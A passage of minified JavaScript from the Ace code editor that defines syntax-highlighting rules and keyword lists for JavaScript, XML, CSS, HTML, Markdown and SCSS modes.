],regex:/(console)(\.)(warn|info|log|error|time|trace|timeEnd|assert)\b/},{token:t,regex:o},{token:"punctuation.operator",regex:/[.](?![.])/,next:"property"},{token:"storage.type",regex:/=>/},{token:"keyword.operator",regex:/--|\+\+|\.{3}|===|==|=|!=|!==|<+=?|>+=?|!|&&|\|\||\?:|[!$%&*+\-~\/^]=?/,next:"start"},{token:"punctuation.operator",regex:/[?:,;.]/,next:"start"},{token:"paren.lparen",regex:/[\[({]/,next:"start"},{token:"paren.rparen",regex:/[\])}]/},{token:"comment",regex:/^#!.*$/}],property:[{token:"text",regex:"\\s+"},{token:["storage.type","punctuation.operator","entity.name.function","text","keyword.operator","text","storage.type","text","entity.name.function","text","paren.lparen"],regex:"("+o+")(\\.)("+o+")(\\s*)(=)(\\s*)(function)(?:(\\s+)(\\w+))?(\\s*)(\\()",next:"function_arguments"},{token:"punctuation.operator",regex:/[.](?![.])/},{token:"support.function",regex:/(s(?:h(?:ift|ow(?:Mod(?:elessDialog|alDialog)|Help))|croll(?:X|By(?:Pages|Lines)?|Y|To)?|t(?:op|rike)|i(?:n|zeToContent|debar|gnText)|ort|u(?:p|b(?:str(?:ing)?)?)|pli(?:ce|t)|e(?:nd|t(?:Re(?:sizable|questHeader)|M(?:i(?:nutes|lliseconds)|onth)|Seconds|Ho(?:tKeys|urs)|Year|Cursor|Time(?:out)?|Interval|ZOptions|Date|UTC(?:M(?:i(?:nutes|lliseconds)|onth)|Seconds|Hours|Date|FullYear)|FullYear|Active)|arch)|qrt|lice|avePreferences|mall)|h(?:ome|andleEvent)|navigate|c(?:har(?:CodeAt|At)|o(?:s|n(?:cat|textual|firm)|mpile)|eil|lear(?:Timeout|Interval)?|a(?:ptureEvents|ll)|reate(?:StyleSheet|Popup|EventObject))|t(?:o(?:GMTString|S(?:tring|ource)|U(?:TCString|pperCase)|Lo(?:caleString|werCase))|est|a(?:n|int(?:Enabled)?))|i(?:s(?:NaN|Finite)|ndexOf|talics)|d(?:isableExternalCapture|ump|etachEvent)|u(?:n(?:shift|taint|escape|watch)|pdateCommands)|j(?:oin|avaEnabled)|p(?:o(?:p|w)|ush|lugins.refresh|a(?:ddings|rse(?:Int|Float)?)|r(?:int|ompt|eference))|e(?:scape|nableExternalCapture|val|lementFromPoint|x(?:p|ec(?:Script|Command)?))|valueOf|UTC|queryCommand(?:State|Indeterm|Enabled|Value)|f(?:i(?:nd|le(?:ModifiedDate|Size|CreatedDate|UpdatedDate)|xed)|o(?:nt(?:size|color)|rward)|loor|romCharCode)|watch|l(?:ink|o(?:ad|g)|astIndexOf)|a(?:sin|nchor|cos|t(?:tachEvent|ob|an(?:2)?)|pply|lert|b(?:s|ort))|r(?:ou(?:nd|teEvents)|e(?:size(?:By|To)|calc|turnValue|place|verse|l(?:oad|ease(?:Capture|Events)))|andom)|g(?:o|et(?:ResponseHeader|M(?:i(?:nutes|lliseconds)|onth)|Se(?:conds|lection)|Hours|Year|Time(?:zoneOffset)?|Da(?:y|te)|UTC(?:M(?:i(?:nutes|lliseconds)|onth)|Seconds|Hours|Da(?:y|te)|FullYear)|FullYear|A(?:ttention|llResponseHeaders)))|m(?:in|ove(?:B(?:y|elow)|To(?:Absolute)?|Above)|ergeAttributes|a(?:tch|rgins|x))|b(?:toa|ig|o(?:ld|rderWidths)|link|ack))\b(?=\()/},{token:"support.function.dom",regex:/(s(?:ub(?:stringData|mit)|plitText|e(?:t(?:NamedItem|Attribute(?:Node)?)|lect))|has(?:ChildNodes|Feature)|namedItem|c(?:l(?:ick|o(?:se|neNode))|reate(?:C(?:omment|DATASection|aption)|T(?:Head|extNode|Foot)|DocumentFragment|ProcessingInstruction|E(?:ntityReference|lement)|Attribute))|tabIndex|i(?:nsert(?:Row|Before|Cell|Data)|tem)|open|delete(?:Row|C(?:ell|aption)|T(?:Head|Foot)|Data)|focus|write(?:ln)?|a(?:dd|ppend(?:Child|Data))|re(?:set|place(?:Child|Data)|move(?:NamedItem|Child|Attribute(?:Node)?)?)|get(?:NamedItem|Element(?:sBy(?:Name|TagName|ClassName)|ById)|Attribute(?:Node)?)|blur)\b(?=\()/},{token:"support.constant",regex:/(s(?:ystemLanguage|cr(?:ipts|ollbars|een(?:X|Y|Top|Left))|t(?:yle(?:Sheets)?|atus(?:Text|bar)?)|ibling(?:Below|Above)|ource|uffixes|e(?:curity(?:Policy)?|l(?:ection|f)))|h(?:istory|ost(?:name)?|as(?:h|Focus))|y|X(?:MLDocument|SLDocument)|n(?:ext|ame(?:space(?:s|URI)|Prop))|M(?:IN_VALUE|AX_VALUE)|c(?:haracterSet|o(?:n(?:structor|trollers)|okieEnabled|lorDepth|mp(?:onents|lete))|urrent|puClass|l(?:i(?:p(?:boardData)?|entInformation)|osed|asses)|alle(?:e|r)|rypto)|t(?:o(?:olbar|p)|ext(?:Transform|Indent|Decoration|Align)|ags)|SQRT(?:1_2|2)|i(?:n(?:ner(?:Height|Width)|put)|ds|gnoreCase)|zIndex|o(?:scpu|n(?:readystatechange|Line)|uter(?:Height|Width)|p(?:sProfile|ener)|ffscreenBuffering)|NEGATIVE_INFINITY|d(?:i(?:splay|alog(?:Height|Top|Width|Left|Arguments)|rectories)|e(?:scription|fault(?:Status|Ch(?:ecked|arset)|View)))|u(?:ser(?:Profile|Language|Agent)|n(?:iqueID|defined)|pdateInterval)|_content|p(?:ixelDepth|ort|ersonalbar|kcs11|l(?:ugins|atform)|a(?:thname|dding(?:Right|Bottom|Top|Left)|rent(?:Window|Layer)?|ge(?:X(?:Offset)?|Y(?:Offset)?))|r(?:o(?:to(?:col|type)|duct(?:Sub)?|mpter)|e(?:vious|fix)))|e(?:n(?:coding|abledPlugin)|x(?:ternal|pando)|mbeds)|v(?:isibility|endor(?:Sub)?|Linkcolor)|URLUnencoded|P(?:I|OSITIVE_INFINITY)|f(?:ilename|o(?:nt(?:Size|Family|Weight)|rmName)|rame(?:s|Element)|gColor)|E|whiteSpace|l(?:i(?:stStyleType|n(?:eHeight|kColor))|o(?:ca(?:tion(?:bar)?|lName)|wsrc)|e(?:ngth|ft(?:Context)?)|a(?:st(?:M(?:odified|atch)|Index|Paren)|yer(?:s|X)|nguage))|a(?:pp(?:MinorVersion|Name|Co(?:deName|re)|Version)|vail(?:Height|Top|Width|Left)|ll|r(?:ity|guments)|Linkcolor|bove)|r(?:ight(?:Context)?|e(?:sponse(?:XML|Text)|adyState))|global|x|m(?:imeTypes|ultiline|enubar|argin(?:Right|Bottom|Top|Left))|L(?:N(?:10|2)|OG(?:10E|2E))|b(?:o(?:ttom|rder(?:Width|RightWidth|BottomWidth|Style|Color|TopWidth|LeftWidth))|ufferDepth|elow|ackground(?:Color|Image)))\b/},{token:"identifier",regex:o},{regex:"",token:"empty",next:"no_regex"}],start:[i.getStartRule("doc-start"),f("start"),{token:"string.regexp",regex:"\\/",next:"regex"},{token:"text",regex:"\\s+|^$",next:"start"},{token:"empty",regex:"",next:"no_regex"}],regex:[{token:"regexp.keyword.operator",regex:"\\\\(?:u[\\da-fA-F]{4}|x[\\da-fA-F]{2}|.)"},{token:"string.regexp",regex:"/[sxngimy]*",next:"no_regex"},{token:"invalid",regex:/\{\d+\b,?\d*\}[+*]|[+*$^?][+*]|[$^][?]|\?{3,}/},{token:"constant.language.escape",regex:/\(\?[:=!]|\)|\{\d+\b,?\d*\}|[+*]\?|[()$^+*?.]/},{token:"constant.language.delimiter",regex:/\|/},{token:"constant.language.escape",regex:/\[\^?/,next:"regex_character_class"},{token:"empty",regex:"$",next:"no_regex"},{defaultToken:"string.regexp"}],regex_character_class:[{token:"regexp.charclass.keyword.operator",regex:"\\\\(?:u[\\da-fA-F]{4}|x[\\da-fA-F]{2}|.)"},{token:"constant.language.escape",regex:"]",next:"regex"},{token:"constant.language.escape",regex:"-"},{token:"empty",regex:"$",next:"no_regex"},{defaultToken:"string.regexp.charachterclass"}],function_arguments:[{token:"variable.parameter",regex:o},{token:"punctuation.operator",regex:"[, ]+"},{token:"punctuation.operator",regex:"$"},{token:"empty",regex:"",next:"no_regex"}],qqstring:[{token:"constant.language.escape",regex:r},{token:"string",regex:"\\\\$",consumeLineEnd:!0},{token:"string",regex:'"|$',next:"no_regex"},{defaultToken:"string"}],qstring:[{token:"constant.language.escape",regex:r},{token:"string",regex:"\\\\$",consumeLineEnd:!0},{token:"string",regex:"'|$",next:"no_regex"},{defaultToken:"string"}]};if(!e||!e.noES6)this.$rules.no_regex.unshift({regex:"[{}]",onMatch:function(e,t,n){this.next=e=="{"?this.nextState:"";if(e=="{"&&n.length)n.unshift("start",t);else if(e=="}"&&n.length){n.shift(),this.next=n.shift();if(this.next.indexOf("string")!=-1||this.next.indexOf("jsx")!=-1)return"paren.quasi.end"}return e=="{"?"paren.lparen":"paren.rparen"},nextState:"start"},{token:"string.quasi.start",regex:/`/,push:[{token:"constant.language.escape",regex:r},{token:"paren.quasi.start",regex:/\${/,push:"start"},{token:"string.quasi.end",regex:/`/,next:"pop"},{defaultToken:"string.quasi"}]}),(!e||e.jsx!=0)&&a.call(this);this.embedRules(i,"doc-",[i.getEndRule("no_regex")]),this.normalizeRules()};r.inherits(u,s),t.JavaScriptHighlightRules=u}),ace.define("ace/mode/xml_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("./text_highlight_rules").TextHighlightRules,s=function(e){var t="[_:a-zA-Z\u00c0-\uffff][-_:.a-zA-Z0-9\u00c0-\uffff]*";this.$rules={start:[{token:"string.cdata.xml",regex:"<\\!\\[CDATA\\[",next:"cdata"},{token:["punctuation.instruction.xml","keyword.instruction.xml"],regex:"(<\\?)("+t+")",next:"processing_instruction"},{token:"comment.start.xml",regex:"<\\!--",next:"comment"},{token:["xml-pe.doctype.xml","xml-pe.doctype.xml"],regex:"(<\\!)(DOCTYPE)(?=[\\s])",next:"doctype",caseInsensitive:!0},{include:"tag"},{token:"text.end-tag-open.xml",regex:"</"},{token:"text.tag-open.xml",regex:"<"},{include:"reference"},{defaultToken:"text.xml"}],processing_instruction:[{token:"entity.other.attribute-name.decl-attribute-name.xml",regex:t},{token:"keyword.operator.decl-attribute-equals.xml",regex:"="},{include:"whitespace"},{include:"string"},{token:"punctuation.xml-decl.xml",regex:"\\?>",next:"start"}],doctype:[{include:"whitespace"},{include:"string"},{token:"xml-pe.doctype.xml",regex:">",next:"start"},{token:"xml-pe.xml",regex:"[-_a-zA-Z0-9:]+"},{token:"punctuation.int-subset",regex:"\\[",push:"int_subset"}],int_subset:[{token:"text.xml",regex:"\\s+"},{token:"punctuation.int-subset.xml",regex:"]",next:"pop"},{token:["punctuation.markup-decl.xml","keyword.markup-decl.xml"],regex:"(<\\!)("+t+")",push:[{token:"text",regex:"\\s+"},{token:"punctuation.markup-decl.xml",regex:">",next:"pop"},{include:"string"}]}],cdata:[{token:"string.cdata.xml",regex:"\\]\\]>",next:"start"},{token:"text.xml",regex:"\\s+"},{token:"text.xml",regex:"(?:[^\\]]|\\](?!\\]>))+"}],comment:[{token:"comment.end.xml",regex:"-->",next:"start"},{defaultToken:"comment.xml"}],reference:[{token:"constant.language.escape.reference.xml",regex:"(?:&#[0-9]+;)|(?:&#x[0-9a-fA-F]+;)|(?:&[a-zA-Z0-9_:\\.-]+;)"}],attr_reference:[{token:"constant.language.escape.reference.attribute-value.xml",regex:"(?:&#[0-9]+;)|(?:&#x[0-9a-fA-F]+;)|(?:&[a-zA-Z0-9_:\\.-]+;)"}],tag:[{token:["meta.tag.punctuation.tag-open.xml","meta.tag.punctuation.end-tag-open.xml","meta.tag.tag-name.xml"],regex:"(?:(<)|(</))((?:"+t+":)?"+t+")",next:[{include:"attributes"},{token:"meta.tag.punctuation.tag-close.xml",regex:"/?>",next:"start"}]}],tag_whitespace:[{token:"text.tag-whitespace.xml",regex:"\\s+"}],whitespace:[{token:"text.whitespace.xml",regex:"\\s+"}],string:[{token:"string.xml",regex:"'",push:[{token:"string.xml",regex:"'",next:"pop"},{defaultToken:"string.xml"}]},{token:"string.xml",regex:'"',push:[{token:"string.xml",regex:'"',next:"pop"},{defaultToken:"string.xml"}]}],attributes:[{token:"entity.other.attribute-name.xml",regex:t},{token:"keyword.operator.attribute-equals.xml",regex:"="},{include:"tag_whitespace"},{include:"attribute_value"}],attribute_value:[{token:"string.attribute-value.xml",regex:"'",push:[{token:"string.attribute-value.xml",regex:"'",next:"pop"},{include:"attr_reference"},{defaultToken:"string.attribute-value.xml"}]},{token:"string.attribute-value.xml",regex:'"',push:[{token:"string.attribute-value.xml",regex:'"',next:"pop"},{include:"attr_reference"},{defaultToken:"string.attribute-value.xml"}]}]},this.constructor===s&&this.normalizeRules()};(function(){this.embedTagRules=function(e,t,n){this.$rules.tag.unshift({token:["meta.tag.punctuation.tag-open.xml","meta.tag."+n+".tag-name.xml"],regex:"(<)("+n+"(?=\\s|>|$))",next:[{include:"attributes"},{token:"meta.tag.punctuation.tag-close.xml",regex:"/?>",next:t+"start"}]}),this.$rules[n+"-end"]=[{include:"attributes"},{token:"meta.tag.punctuation.tag-close.xml",regex:"/?>",next:"start",onMatch:function(e,t,n){return n.splice(0),this.token}}],this.embedRules(e,t,[{token:["meta.tag.punctuation.end-tag-open.xml","meta.tag."+n+".tag-name.xml"],regex:"(</)("+n+"(?=\\s|>|$))",next:n+"-end"},{token:"string.cdata.xml",regex:"<\\!\\[CDATA\\["},{token:"string.cdata.xml",regex:"\\]\\]>"}])}}).call(i.prototype),r.inherits(s,i),t.XmlHighlightRules=s}),ace.define("ace/mode/css_highlight_rules",["require","exports","module","ace/lib/oop","ace/lib/lang","ace/mode/text_highlight_rules"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("../lib/lang"),s=e("./text_highlight_rules").TextHighlightRules,o=t.supportType="align-content|align-items|align-self|all|animation|animation-delay|animation-direction|animation-duration|animation-fill-mode|animation-iteration-count|animation-name|animation-play-state|animation-timing-function|backface-visibility|background|background-attachment|background-blend-mode|background-clip|background-color|background-image|background-origin|background-position|background-repeat|background-size|border|border-bottom|border-bottom-color|border-bottom-left-radius|border-bottom-right-radius|border-bottom-style|border-bottom-width|border-collapse|border-color|border-image|border-image-outset|border-image-repeat|border-image-slice|border-image-source|border-image-width|border-left|border-left-color|border-left-style|border-left-width|border-radius|border-right|border-right-color|border-right-style|border-right-width|border-spacing|border-style|border-top|border-top-color|border-top-left-radius|border-top-right-radius|border-top-style|border-top-width|border-width|bottom|box-shadow|box-sizing|caption-side|clear|clip|color|column-count|column-fill|column-gap|column-rule|column-rule-color|column-rule-style|column-rule-width|column-span|column-width|columns|content|counter-increment|counter-reset|cursor|direction|display|empty-cells|filter|flex|flex-basis|flex-direction|flex-flow|flex-grow|flex-shrink|flex-wrap|float|font|font-family|font-size|font-size-adjust|font-stretch|font-style|font-variant|font-weight|hanging-punctuation|height|justify-content|left|letter-spacing|line-height|list-style|list-style-image|list-style-position|list-style-type|margin|margin-bottom|margin-left|margin-right|margin-top|max-height|max-width|max-zoom|min-height|min-width|min-zoom|nav-down|nav-index|nav-left|nav-right|nav-up|opacity|order|outline|outline-color|outline-offset|outline-style|outline-width|overflow|overflow-x|overflow-y|padding|padding-bottom|padding-left|padding-right|padding-top|page-break-after|page-break-before|page-break-inside|perspective|perspective-origin|position|quotes|resize|right|tab-size|table-layout|text-align|text-align-last|text-decoration|text-decoration-color|text-decoration-line|text-decoration-style|text-indent|text-justify|text-overflow|text-shadow|text-transform|top|transform|transform-origin|transform-style|transition|transition-delay|transition-duration|transition-property|transition-timing-function|unicode-bidi|user-select|user-zoom|vertical-align|visibility|white-space|width|word-break|word-spacing|word-wrap|z-index",u=t.supportFunction="rgb|rgba|url|attr|counter|counters",a=t.supportConstant="absolute|after-edge|after|all-scroll|all|alphabetic|always|antialiased|armenian|auto|avoid-column|avoid-page|avoid|balance|baseline|before-edge|before|below|bidi-override|block-line-height|block|bold|bolder|border-box|both|bottom|box|break-all|break-word|capitalize|caps-height|caption|center|central|char|circle|cjk-ideographic|clone|close-quote|col-resize|collapse|column|consider-shifts|contain|content-box|cover|crosshair|cubic-bezier|dashed|decimal-leading-zero|decimal|default|disabled|disc|disregard-shifts|distribute-all-lines|distribute-letter|distribute-space|distribute|dotted|double|e-resize|ease-in|ease-in-out|ease-out|ease|ellipsis|end|exclude-ruby|fill|fixed|georgian|glyphs|grid-height|groove|hand|hanging|hebrew|help|hidden|hiragana-iroha|hiragana|horizontal|icon|ideograph-alpha|ideograph-numeric|ideograph-parenthesis|ideograph-space|ideographic|inactive|include-ruby|inherit|initial|inline-block|inline-box|inline-line-height|inline-table|inline|inset|inside|inter-ideograph|inter-word|invert|italic|justify|katakana-iroha|katakana|keep-all|last|left|lighter|line-edge|line-through|line|linear|list-item|local|loose|lower-alpha|lower-greek|lower-latin|lower-roman|lowercase|lr-tb|ltr|mathematical|max-height|max-size|medium|menu|message-box|middle|move|n-resize|ne-resize|newspaper|no-change|no-close-quote|no-drop|no-open-quote|no-repeat|none|normal|not-allowed|nowrap|nw-resize|oblique|open-quote|outset|outside|overline|padding-box|page|pointer|pre-line|pre-wrap|pre|preserve-3d|progress|relative|repeat-x|repeat-y|repeat|replaced|reset-size|ridge|right|round|row-resize|rtl|s-resize|scroll|se-resize|separate|slice|small-caps|small-caption|solid|space|square|start|static|status-bar|step-end|step-start|steps|stretch|strict|sub|super|sw-resize|table-caption|table-cell|table-column-group|table-column|table-footer-group|table-header-group|table-row-group|table-row|table|tb-rl|text-after-edge|text-before-edge|text-bottom|text-size|text-top|text|thick|thin|transparent|underline|upper-alpha|upper-latin|upper-roman|uppercase|use-script|vertical-ideographic|vertical-text|visible|w-resize|wait|whitespace|z-index|zero|zoom",f=t.supportConstantColor="aliceblue|antiquewhite|aqua|aquamarine|azure|beige|bisque|black|blanchedalmond|blue|blueviolet|brown|burlywood|cadetblue|chartreuse|chocolate|coral|cornflowerblue|cornsilk|crimson|cyan|darkblue|darkcyan|darkgoldenrod|darkgray|darkgreen|darkgrey|darkkhaki|darkmagenta|darkolivegreen|darkorange|darkorchid|darkred|darksalmon|darkseagreen|darkslateblue|darkslategray|darkslategrey|darkturquoise|darkviolet|deeppink|deepskyblue|dimgray|dimgrey|dodgerblue|firebrick|floralwhite|forestgreen|fuchsia|gainsboro|ghostwhite|gold|goldenrod|gray|green|greenyellow|grey|honeydew|hotpink|indianred|indigo|ivory|khaki|lavender|lavenderblush|lawngreen|lemonchiffon|lightblue|lightcoral|lightcyan|lightgoldenrodyellow|lightgray|lightgreen|lightgrey|lightpink|lightsalmon|lightseagreen|lightskyblue|lightslategray|lightslategrey|lightsteelblue|lightyellow|lime|limegreen|linen|magenta|maroon|mediumaquamarine|mediumblue|mediumorchid|mediumpurple|mediumseagreen|mediumslateblue|mediumspringgreen|mediumturquoise|mediumvioletred|midnightblue|mintcream|mistyrose|moccasin|navajowhite|navy|oldlace|olive|olivedrab|orange|orangered|orchid|palegoldenrod|palegreen|paleturquoise|palevioletred|papayawhip|peachpuff|peru|pink|plum|powderblue|purple|rebeccapurple|red|rosybrown|royalblue|saddlebrown|salmon|sandybrown|seagreen|seashell|sienna|silver|skyblue|slateblue|slategray|slategrey|snow|springgreen|steelblue|tan|teal|thistle|tomato|turquoise|violet|wheat|white|whitesmoke|yellow|yellowgreen",l=t.supportConstantFonts="arial|century|comic|courier|cursive|fantasy|garamond|georgia|helvetica|impact|lucida|symbol|system|tahoma|times|trebuchet|utopia|verdana|webdings|sans-serif|serif|monospace",c=t.numRe="\\-?(?:(?:[0-9]+(?:\\.[0-9]+)?)|(?:\\.[0-9]+))",h=t.pseudoElements="(\\:+)\\b(after|before|first-letter|first-line|moz-selection|selection)\\b",p=t.pseudoClasses="(:)\\b(active|checked|disabled|empty|enabled|first-child|first-of-type|focus|hover|indeterminate|invalid|last-child|last-of-type|link|not|nth-child|nth-last-child|nth-last-of-type|nth-of-type|only-child|only-of-type|required|root|target|valid|visited)\\b",d=function(){var e=this.createKeywordMapper({"support.function":u,"support.constant":a,"support.type":o,"support.constant.color":f,"support.constant.fonts":l},"text",!0);this.$rules={start:[{include:["strings","url","comments"]},{token:"paren.lparen",regex:"\\{",next:"ruleset"},{token:"paren.rparen",regex:"\\}"},{token:"string",regex:"@(?!viewport)",next:"media"},{token:"keyword",regex:"#[a-z0-9-_]+"},{token:"keyword",regex:"%"},{token:"variable",regex:"\\.[a-z0-9-_]+"},{token:"string",regex:":[a-z0-9-_]+"},{token:"constant.numeric",regex:c},{token:"constant",regex:"[a-z0-9-_]+"},{caseInsensitive:!0}],media:[{include:["strings","url","comments"]},{token:"paren.lparen",regex:"\\{",next:"start"},{token:"paren.rparen",regex:"\\}",next:"start"},{token:"string",regex:";",next:"start"},{token:"keyword",regex:"(?:media|supports|document|charset|import|namespace|media|supports|document|page|font|keyframes|viewport|counter-style|font-feature-values|swash|ornaments|annotation|stylistic|styleset|character-variant)"}],comments:[{token:"comment",regex:"\\/\\*",push:[{token:"comment",regex:"\\*\\/",next:"pop"},{defaultToken:"comment"}]}],ruleset:[{regex:"-(webkit|ms|moz|o)-",token:"text"},{token:"punctuation.operator",regex:"[:;]"},{token:"paren.rparen",regex:"\\}",next:"start"},{include:["strings","url","comments"]},{token:["constant.numeric","keyword"],regex:"("+c+")(ch|cm|deg|em|ex|fr|gd|grad|Hz|in|kHz|mm|ms|pc|pt|px|rad|rem|s|turn|vh|vmax|vmin|vm|vw|%)"},{token:"constant.numeric",regex:c},{token:"constant.numeric",regex:"#[a-f0-9]{6}"},{token:"constant.numeric",regex:"#[a-f0-9]{3}"},{token:["punctuation","entity.other.attribute-name.pseudo-element.css"],regex:h},{token:["punctuation","entity.other.attribute-name.pseudo-class.css"],regex:p},{include:"url"},{token:e,regex:"\\-?[a-zA-Z_][a-zA-Z0-9_\\-]*"},{caseInsensitive:!0}],url:[{token:"support.function",regex:"(?:url(:?-prefix)?|domain|regexp)\\(",push:[{token:"support.function",regex:"\\)",next:"pop"},{defaultToken:"string"}]}],strings:[{token:"string.start",regex:"'",push:[{token:"string.end",regex:"'|$",next:"pop"},{include:"escapes"},{token:"constant.language.escape",regex:/\\$/,consumeLineEnd:!0},{defaultToken:"string"}]},{token:"string.start",regex:'"',push:[{token:"string.end",regex:'"|$',next:"pop"},{include:"escapes"},{token:"constant.language.escape",regex:/\\$/,consumeLineEnd:!0},{defaultToken:"string"}]}],escapes:[{token:"constant.language.escape",regex:/\\([a-fA-F\d]{1,6}|[^a-fA-F\d])/}]},this.normalizeRules()};r.inherits(d,s),t.CssHighlightRules=d}),ace.define("ace/mode/html_highlight_rules",["require","exports","module","ace/lib/oop","ace/lib/lang","ace/mode/css_highlight_rules","ace/mode/javascript_highlight_rules","ace/mode/xml_highlight_rules"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("../lib/lang"),s=e("./css_highlight_rules").CssHighlightRules,o=e("./javascript_highlight_rules").JavaScriptHighlightRules,u=e("./xml_highlight_rules").XmlHighlightRules,a=i.createMap({a:"anchor",button:"form",form:"form",img:"image",input:"form",label:"form",option:"form",script:"script",select:"form",textarea:"form",style:"style",table:"table",tbody:"table",td:"table",tfoot:"table",th:"table",tr:"table"}),f=function(){u.call(this),this.addRules({attributes:[{include:"tag_whitespace"},{token:"entity.other.attribute-name.xml",regex:"[-_a-zA-Z0-9:.]+"},{token:"keyword.operator.attribute-equals.xml",regex:"=",push:[{include:"tag_whitespace"},{token:"string.unquoted.attribute-value.html",regex:"[^<>='\"`\\s]+",next:"pop"},{token:"empty",regex:"",next:"pop"}]},{include:"attribute_value"}],tag:[{token:function(e,t){var n=a[t];return["meta.tag.punctuation."+(e=="<"?"":"end-")+"tag-open.xml","meta.tag"+(n?"."+n:"")+".tag-name.xml"]},regex:"(</?)([-_a-zA-Z0-9:.]+)",next:"tag_stuff"}],tag_stuff:[{include:"attributes"},{token:"meta.tag.punctuation.tag-close.xml",regex:"/?>",next:"start"}]}),this.embedTagRules(s,"css-","style"),this.embedTagRules((new o({jsx:!1})).getRules(),"js-","script"),this.constructor===f&&this.normalizeRules()};r.inherits(f,u),t.HtmlHighlightRules=f}),ace.define("ace/mode/markdown_highlight_rules",["require","exports","module","ace/lib/oop","ace/lib/lang","ace/mode/text_highlight_rules","ace/mode/javascript_highlight_rules","ace/mode/xml_highlight_rules","ace/mode/html_highlight_rules","ace/mode/css_highlight_rules"],function(e,t,n){"use strict";function c(e,t){return{token:"support.function",regex:"^\\s*```"+e+"\\s*$",push:t+"start"}}var r=e("../lib/oop"),i=e("../lib/lang"),s=e("./text_highlight_rules").TextHighlightRules,o=e("./javascript_highlight_rules").JavaScriptHighlightRules,u=e("./xml_highlight_rules").XmlHighlightRules,a=e("./html_highlight_rules").HtmlHighlightRules,f=e("./css_highlight_rules").CssHighlightRules,l=function(e){return"(?:[^"+i.escapeRegExp(e)+"\\\\]|\\\\.)*"},h=function(){a.call(this),this.$rules.start.unshift({token:"empty_line",regex:"^$",next:"allowBlock"},{token:"markup.heading.1",regex:"^=+(?=\\s*$)"},{token:"markup.heading.2",regex:"^\\-+(?=\\s*$)"},{token:function(e){return"markup.heading."+e.length},regex:/^#{1,6}(?=\s|$)/,next:"header"},c("(?:javascript|js)","jscode-"),c("xml","xmlcode-"),c("html","htmlcode-"),c("css","csscode-"),{token:"support.function",regex:"^\\s*```\\s*\\S*(?:{.*?\\})?\\s*$",next:"githubblock"},{token:"string.blockquote",regex:"^\\s*>\\s*(?:[*+-]|\\d+\\.)?\\s+",next:"blockquote"},{token:"constant",regex:"^ {0,2}(?:(?: ?\\* ?){3,}|(?: ?\\- ?){3,}|(?: ?\\_ ?){3,})\\s*$",next:"allowBlock"},{token:"markup.list",regex:"^\\s{0,3}(?:[*+-]|\\d+\\.)\\s+",next:"listblock-start"},{include:"basic"}),this.addRules({basic:[{token:"constant.language.escape",regex:/\\[\\`*_{}\[\]()#+\-.!]/},{token:"support.function",regex:"(`+)(.*?[^`])(\\1)"},{token:["text","constant","text","url","string","text"],regex:'^([ ]{0,3}\\[)([^\\]]+)(\\]:\\s*)([^ ]+)(\\s*(?:["][^"]+["])?(\\s*))$'},{token:["text","string","text","constant","text"],regex:"(\\[)("+l("]")+")(\\]\\s*\\[)("+l("]")+")(\\])"},{token:["text","string","text","markup.underline","string","text"],regex:"(\\[)("+l("]")+")(\\]\\()"+'((?:[^\\)\\s\\\\]|\\\\.|\\s(?=[^"]))*)'+'(\\s*"'+l('"')+'"\\s*)?'+"(\\))"},{token:"string.strong",regex:"([*]{2}|[_]{2}(?=\\S))(.*?\\S[*_]*)(\\1)"},{token:"string.emphasis",regex:"([*]|[_](?=\\S))(.*?\\S[*_]*)(\\1)"},{token:["text","url","text"],regex:"(<)((?:https?|ftp|dict):[^'\">\\s]+|(?:mailto:)?[-.\\w]+\\@[-a-z0-9]+(?:\\.[-a-z0-9]+)*\\.[a-z]+)(>)"}],allowBlock:[{token:"support.function",regex:"^ {4}.+",next:"allowBlock"},{token:"empty_line",regex:"^$",next:"allowBlock"},{token:"empty",regex:"",next:"start"}],header:[{regex:"$",next:"start"},{include:"basic"},{defaultToken:"heading"}],"listblock-start":[{token:"support.variable",regex:/(?:\[[ x]\])?/,next:"listblock"}],listblock:[{token:"empty_line",regex:"^$",next:"start"},{token:"markup.list",regex:"^\\s{0,3}(?:[*+-]|\\d+\\.)\\s+",next:"listblock-start"},{include:"basic",noEscape:!0},{token:"support.function",regex:"^\\s*```\\s*[a-zA-Z]*(?:{.*?\\})?\\s*$",next:"githubblock"},{defaultToken:"list"}],blockquote:[{token:"empty_line",regex:"^\\s*$",next:"start"},{token:"string.blockquote",regex:"^\\s*>\\s*(?:[*+-]|\\d+\\.)?\\s+",next:"blockquote"},{include:"basic",noEscape:!0},{defaultToken:"string.blockquote"}],githubblock:[{token:"support.function",regex:"^\\s*```",next:"start"},{defaultToken:"support.function"}]}),this.embedRules(o,"jscode-",[{token:"support.function",regex:"^\\s*```",next:"pop"}]),this.embedRules(a,"htmlcode-",[{token:"support.function",regex:"^\\s*```",next:"pop"}]),this.embedRules(f,"csscode-",[{token:"support.function",regex:"^\\s*```",next:"pop"}]),this.embedRules(u,"xmlcode-",[{token:"support.function",regex:"^\\s*```",next:"pop"}]),this.normalizeRules()};r.inherits(h,s),t.MarkdownHighlightRules=h}),ace.define("ace/mode/scss_highlight_rules",["require","exports","module","ace/lib/oop","ace/lib/lang","ace/mode/text_highlight_rules"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("../lib/lang"),s=e("./text_highlight_rules").TextHighlightRules,o=function(){var e=i.arrayToMap(function(){var e="-webkit-|-moz-|-o-|-ms-|-svg-|-pie-|-khtml-".split("|"),t="appearance|background-clip|background-inline-policy|background-origin|background-size|binding|border-bottom-colors|border-left-colors|border-right-colors|border-top-colors|border-end|border-end-color|border-end-style|border-end-width|border-image|border-start|border-start-color|border-start-style|border-start-width|box-align|box-direction|box-flex|box-flexgroup|box-ordinal-group|box-orient|box-pack|box-sizing|column-count|column-gap|column-width|column-rule|column-rule-width|column-rule-style|column-rule-color|float-edge|font-feature-settings|font-language-override|force-broken-image-icon|image-region|margin-end|margin-start|opacity|outline|outline-color|outline-offset|outline-radius|outline-radius-bottomleft|outline-radius-bottomright|outline-radius-topleft|outline-radius-topright|outline-style|outline-width|padding-end|padding-start|stack-sizing|tab-size|text-blink|text-decoration-color|text-decoration-line|text-decoration-style|transform|transform-origin|transition|transition-delay|transition-duration|transition-property|transition-timing-function|user-focus|user-input|user-modify|user-select|window-shadow|border-radius".split("|"),n="azimuth|background-attachment|background-color|background-image|background-position|background-repeat|background|border-bottom-color|border-bottom-style|border-bottom-width|border-bottom|border-collapse|border-color|border-left-color|border-left-style|borde